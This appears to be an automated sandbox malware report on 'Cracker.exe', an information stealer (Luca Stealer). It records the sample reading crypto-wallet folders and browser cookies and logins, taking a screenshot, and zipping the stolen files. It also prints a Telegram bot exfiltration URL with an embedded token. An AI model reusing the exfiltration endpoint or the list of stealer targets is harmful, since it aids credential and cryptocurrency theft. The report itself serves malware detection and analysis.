      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
      Source: C:\Users\user\Desktop\Cracker.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior

      Remote Access Functionality

      barindex
      Yara detected Luca Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: Process Memory Space: Cracker.exe PID: 7528, type: MEMORYSTR

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts31
      Windows Management Instrumentation      		1
      DLL Side-Loading      		11
      Process Injection      		1
      Masquerading      		1
      OS Credential Dumping      		21
      Security Software Discovery      		Remote Services3
      Data from Local System      		1
      Web Service      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Abuse Elevation Control Mechanism      		1
      Disable or Modify Tools      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media1
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading      		31
      Virtualization/Sandbox Evasion      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive1
      Ingress Tool Transfer      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture3
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Abuse Elevation Control Mechanism      		LSA Secrets1
      System Network Configuration Discovery      		SSHKeylogging4
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Obfuscated Files or Information      		Cached Domain Credentials1
      File and Directory Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      Software Packing      		DCSync22
      System Information Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Cracker.exe39%ReversingLabsWin64.Trojan.Barys
      Cracker.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://cdn.ipwhois.io/flags/us.svgM0%Avira URL Cloudsafe
      https://cdn.ipwhois.io/flags/us.svg0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      ipwho.is
      		108.181.61.49
      		truefalse
        		high
        api.telegram.org
        		149.154.167.220
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://ac.ecosia.org/autocomplete?q=Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.drfalse
            		high
            https://duckduckgo.com/chrome_newtabCracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.drfalse
              		high
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.drfalse
                		high
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.drfalse
                  		high
                  https://duckduckgo.com/ac/?q=Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.drfalse
                    		high
                    https://api.telegram.org/bot6924568893:AAFJucbuZH8gWTMC3Nv_EZKmmqi4jI-5y04/sendDocument?chat_id=-412Cracker.exe, 00000000.00000003.1978384633.0000029794F44000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoCracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.drfalse
                        		high
                        https://www.ecosia.org/newtab/Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.drfalse
                          		high
                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.drfalse
                            		high
                            https://cdn.ipwhois.io/flags/us.svgMCracker.exe, 00000000.00000002.1979276829.00000297930A2000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchCracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.drfalse
                              		high
                              https://cdn.ipwhois.io/flags/us.svgCracker.exe, 00000000.00000002.1979276829.00000297930A2000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              149.154.167.220
                              		api.telegram.orgUnited Kingdom
                              		62041TELEGRAMRUfalse
                              108.181.61.49
                              		ipwho.isCanada
                              		852ASN852CAfalse

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1551915
                              Start date and time:2024-11-08 11:42:19 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 4m 36s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Run name:Run with higher sleep bypass
                              Number of analysed new started processes analysed:7
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Cracker.exe
                              Detection:MAL
                              Classification:mal92.troj.spyw.evad.winEXE@4/14@2/2
                              EGA Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                              • Stop behavior analysis, all processes terminated

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: Cracker.exe

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              149.154.167.220Jeyt1T7XTm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                  file.exeGet hashmaliciousXWormBrowse
                                    https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=xqrhyulnFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/9lotF#c2ouY2hvaTFAaGRlbC5jby5rcg==Get hashmaliciousUnknownBrowse
                                      https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=xzgvjnkcFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/E7B7K#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                        vUWhc67uSc.exeGet hashmaliciousStormKittyBrowse
                                          vUWhc67uSc.exeGet hashmaliciousStormKittyBrowse
                                            ZF3dxapdNLa4lNL.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              PO#7372732993039398372372973928392832973PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                108.181.61.49Auftragsbest#U00e4tigung 20241107_pdf.com.exeGet hashmaliciousQuasarBrowse
                                                  Bestellung - 20240001833.com.exeGet hashmaliciousQuasarBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    api.telegram.orgJeyt1T7XTm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                    • 149.154.167.220
                                                    file.exeGet hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=xqrhyulnFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/9lotF#c2ouY2hvaTFAaGRlbC5jby5rcg==Get hashmaliciousUnknownBrowse
                                                    • 149.154.167.220
                                                    https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=xzgvjnkcFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/E7B7K#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                    • 149.154.167.220
                                                    SecuriteInfo.com.Win32.MalwareX-gen.20028.17631.exeGet hashmaliciousAsyncRATBrowse
                                                    • 149.154.167.220
                                                    vUWhc67uSc.exeGet hashmaliciousStormKittyBrowse
                                                    • 149.154.167.220
                                                    vUWhc67uSc.exeGet hashmaliciousStormKittyBrowse
                                                    • 149.154.167.220
                                                    ZF3dxapdNLa4lNL.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220
                                                    ipwho.isAuftragsbest#U00e4tigung 20241107_pdf.com.exeGet hashmaliciousQuasarBrowse
                                                    • 108.181.61.49
                                                    DeGrsOm654.exeGet hashmaliciousQuasarBrowse
                                                    • 195.201.57.90
                                                    Bestellung - 20240001833.com.exeGet hashmaliciousQuasarBrowse
                                                    • 108.181.61.49
                                                    V7FWuG5Lct.exeGet hashmaliciousQuasarBrowse
                                                    • 195.201.57.90
                                                    7ll96oOSBF.exeGet hashmaliciousQuasarBrowse
                                                    • 195.201.57.90
                                                    PQQmkT4xPT.exeGet hashmaliciousQuasarBrowse
                                                    • 195.201.57.90
                                                    aLboIGKNL5.exeGet hashmaliciousQuasarBrowse
                                                    • 195.201.57.90
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                                    • 147.135.36.89
                                                    V9fubyadY6.exeGet hashmaliciousQuasarBrowse
                                                    • 195.201.57.90

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    TELEGRAMRUJeyt1T7XTm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                    • 149.154.167.220
                                                    file.exeGet hashmaliciousXWormBrowse
                                                    • 149.154.167.220
                                                    https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=xqrhyulnFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/9lotF#c2ouY2hvaTFAaGRlbC5jby5rcg==Get hashmaliciousUnknownBrowse
                                                    • 149.154.167.220
                                                    https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=xzgvjnkcFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/E7B7K#kh.jang@hyundaimovex.comGet hashmaliciousUnknownBrowse
                                                    • 149.154.167.220
                                                    vUWhc67uSc.exeGet hashmaliciousStormKittyBrowse
                                                    • 149.154.167.220
                                                    vUWhc67uSc.exeGet hashmaliciousStormKittyBrowse
                                                    • 149.154.167.220
                                                    ZF3dxapdNLa4lNL.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 149.154.167.220
                                                    PO#7372732993039398372372973928392832973PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    • 149.154.167.220
                                                    ASN852CAhiss.mpsl.elfGet hashmaliciousUnknownBrowse
                                                    • 50.99.143.232
                                                    byte.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 161.184.40.161
                                                    byte.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 206.75.104.133
                                                    sora.ppc.elfGet hashmaliciousUnknownBrowse
                                                    • 207.81.69.41
                                                    Auftragsbest#U00e4tigung 20241107_pdf.com.exeGet hashmaliciousQuasarBrowse
                                                    • 108.181.61.49
                                                    e5AiOG6uDI.elfGet hashmaliciousMirai, MoobotBrowse
                                                    • 173.182.225.99
                                                    nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                    • 75.159.38.52
                                                    nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                    • 207.216.32.185
                                                    Bestellung - 20240001833.com.exeGet hashmaliciousQuasarBrowse
                                                    • 108.181.61.49

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0eeQwUFcwrXk.lnkGet hashmaliciousDucktailBrowse
                                                    • 149.154.167.220
                                                    4YgQ2xN41W.lnkGet hashmaliciousRDPWrap Tool, DucktailBrowse
                                                    • 149.154.167.220
                                                    EERNI7eIS7.lnkGet hashmaliciousDucktailBrowse
                                                    • 149.154.167.220
                                                    cOOhDuNWt7.lnkGet hashmaliciousDucktailBrowse
                                                    • 149.154.167.220
                                                    monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                    • 149.154.167.220
                                                    O5PR3i6ILA.lnkGet hashmaliciousDucktailBrowse
                                                    • 149.154.167.220
                                                    SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkGet hashmaliciousDucktailBrowse
                                                    • 149.154.167.220
                                                    monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                    • 149.154.167.220
                                                    https://support-facebook.kb.help/your-facebook-account-has-been-restricted/Get hashmaliciousHTMLPhisherBrowse
                                                    • 149.154.167.220

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):0.773832331134527
                                                    Encrypted:false
                                                    SSDEEP:3:NlllulCl:NllUC
                                                    MD5:51407C7D0B358AFDE23AF44BEFFA0958
                                                    SHA1:376DAD3EDB07DFFB93ABD6CDD7ABD55033E21E07
                                                    SHA-256:FB87E24EA64BE629C9755B582962C4D97F7754D83FEE2BD673CB24985988318F
                                                    SHA-512:D0EA3008C9EC6649A587BEB64472555A36472DD049BEDC934CFD3417D01F562B64971DA3DCAC4095D7339EC228D0AE9C0523A99213C390BB2B3C1BBF3636FAA7
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:@...e...........................................................

                                                    C:\Users\user\AppData\Local\Temp\Cookies

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.8475592208333753
                                                    Encrypted:false
                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
                                                    MD5:BE99679A2B018331EACD3A1B680E3757
                                                    SHA1:6E6732E173C91B0C3287AB4B161FE3676D33449A
                                                    SHA-256:C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
                                                    SHA-512:9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\History

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):159744
                                                    Entropy (8bit):0.5394293526345721
                                                    Encrypted:false
                                                    SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                    MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                    SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                    SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                    SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\Login Data

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\Cookies\Chrome_Default_Network.txt

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):286
                                                    Entropy (8bit):5.767232012810563
                                                    Encrypted:false
                                                    SSDEEP:6:PkU6W3rzxbiEvcKGWlmIrBNuYraqWTfqgqlB1Hwsv7OjPn:cU9bzkEv7BdBNuMWfqnym7O7n
                                                    MD5:01074DEC455BFC7D979EEA418871413C
                                                    SHA1:8C2AA1FA48839290016BADCF927FD46EEEBC909A
                                                    SHA-256:A39398718E40F7B5639D3EC5335EFDF07A8DAC7036DC09A085A81F5C35185CE4
                                                    SHA-512:110C784EE4F1D57A4C8151F1AD838A1CC2E5BF87C5FE5F9EE81F0E5CC9642480BDB087375AB3F7A069215A076C229A573E70B8807EEA3527093C5C1CEE16774D
                                                    Malicious:false
                                                    Preview:.google.com.false./.true.13343559538131870.1P_JAR.2023-10-05-08...google.com.true./.true.13356778738131921.NID.511=orcSInoZBb6Srw0PdPMNeLGKsegfLi-tQnviho5hKJXKDNg0kXIPnfTcuwV5r7RqjT893pWGJF7klKqldBoj4rDJvxfFlgDOCcW9aKDnU9zIlUh2LP0vO8k3uT0gHJD1JvVAclkJnKwZG6hDAl62HrMxNrUeqSR-WF1J-l9YYgE

                                                    C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\screen1.png

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):909412
                                                    Entropy (8bit):7.551322686397017
                                                    Encrypted:false
                                                    SSDEEP:12288:3IHaq3vcF6Vmf0ygWavkyqr5jSKzPSEDdYu+obWLbtEwoSCcA/8zeppDAaIwis5x:3ItPVm85qr5jtzPdDdY6bJScjiUx
                                                    MD5:5C75257120C226EE420A3EB2BEDC41CB
                                                    SHA1:439F188851B260B7AED5CC8B76B99341D3C7AC71
                                                    SHA-256:CACFB3E2F087E5B485D6F0C38C28D942DBBD6BB52685190A1AE19C9C393D52BA
                                                    SHA-512:1EDB61B19A979BF46E66A3BB64C7431DB19FC37656D839532953B797697AD6DFB4E1FBA3547F8C9DFC5EF93BC1C7171A6AA0125A2DC360E1D7005ED3A8CAEBC0
                                                    Malicious:false
                                                    Preview:.PNG........IHDR................C...+IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6...".....I)..H""..L.$a..I.d&...$.R..m$!..d&..$$.....~...@)..`.&."...d..T..Ak.Z+.V.i...m.i"3). .....q..@...Mf..H"".L2..D...U2..D...m.q$....&.If.../"..$.2...6..$.(".Df..H....8.d&..@f.PJ.6..`...O..Af.0M.}.Ske.^s?..D....@D....IHB..If...R....ls?.R.Dk........d&...... "h.1...m2..IB..

                                                    C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\sensitive-files.zip

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                    Category:dropped
                                                    Size (bytes):22466
                                                    Entropy (8bit):7.84152039990611
                                                    Encrypted:false
                                                    SSDEEP:384:snZTcGKx9Zh9tnVS38uVS38M/knZTcGKx9Zh9tnVS38uVS38M/Xw:sn+GKxDhX9+Mcn+GKxDhX9+MI
                                                    MD5:802D4D78AF9EBAAC40883960E962C014
                                                    SHA1:270F0A639E3E4B634CDE83F755FBBEE833E766AC
                                                    SHA-256:1A163D89833665304EC1514C45F7D1ACB9128DDAAD220A50EAC7F8A4EAD846DE
                                                    SHA-512:4F0E90EE289EEB9313D90B46267ECD067AC5C5872E6B69E1F31D00A7C8A6FC0F72A719B66FB0586AA6B23774DE93DA9002385495CE4DAA4E9D41075EF007814C
                                                    Malicious:false
                                                    Preview:PK.........^hYA.]............EFOYFBOLXA.png..In@!.C..z.0C ..~...Re...u.s......o.v.!...4...Z...w...dgg....../.i3$......a..O.....-A9r.&..?..K@Zt1.no.7UL..^.b&......p.S.Ua6"..]i...e.5..f.p..k..G.%..LI...a.....|...E.}..G....>.....yS..=...0p...YQ...j ..H...$......).i.....]S.C...W..*..1....u.....t.a%....D.....0...R.O..g3....;Z=;<CG.D8..Z.Sjf....[...V.(z...e...~ZY.....W...R.^..+5..p..{^. .G.us.....{.M.z...s.....<.T....o.jv...."4..c....2.c0e.s.6.:{....6..Dk.[...Y.i.z.c.-.Rq9a..s.t..>}..'kBo.\...Z...Q..J..6.....q.h@7s.....%..'.n.v.dK..X..{u..~B.:.-r...Uox.h.8.._A.[Q....P....Q"....3AV..i...g.....5...|...Owoh......@l.....d.Cv~[.S...V5^..f..+.G..\.....PK.........^hY..d)............GAOBCVIQIJ.png..I.E!.E...GE.^......r.....B.ha.6...j5....CgC.k.....w#.-U...;....4.KB..dL.......zQo....m...oV2..~...Lm....`}@4..PQ<...L"-...d...j}}....u'............Cn...3h.....g*....V.+..i..o..=...E.d.:......)$..>Kb....x.:)....,.....#..{$.Bni...:Gc.....U...Z..r+...u...

                                                    C:\Users\user\AppData\Local\Temp\PeAx1cGearPUOxYmqJLOshcWh0wbHd\user_info.txt

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                    Category:dropped
                                                    Size (bytes):663
                                                    Entropy (8bit):5.347368821663218
                                                    Encrypted:false
                                                    SSDEEP:12:eM367QN3e1oQQ84xx6YIrJFrtlQM7NlVDeBQM3aWfgyIHdAMij01+XaBLF:ex0NkhWxxVyqM7NlVae8dOAMijU+qBLF
                                                    MD5:2C69CE6A65E90F9454B876240A4CA2A2
                                                    SHA1:26B74B4E32513FEAC9F11AF2178C5A94C94AECFD
                                                    SHA-256:CC0F6AC94A3ACD23CB80A7CE6AAC9A75680EF9B7F58C008CFD6AD686018BA4F1
                                                    SHA-512:708878DC8C171A3703CB22EC259DFFBC3CE703E627A9BF3C48A8AE76AFD024EDE49888762A9657276B505541BA98A33F4238A8804160FB98DE8772FA0474E5B6
                                                    Malicious:false
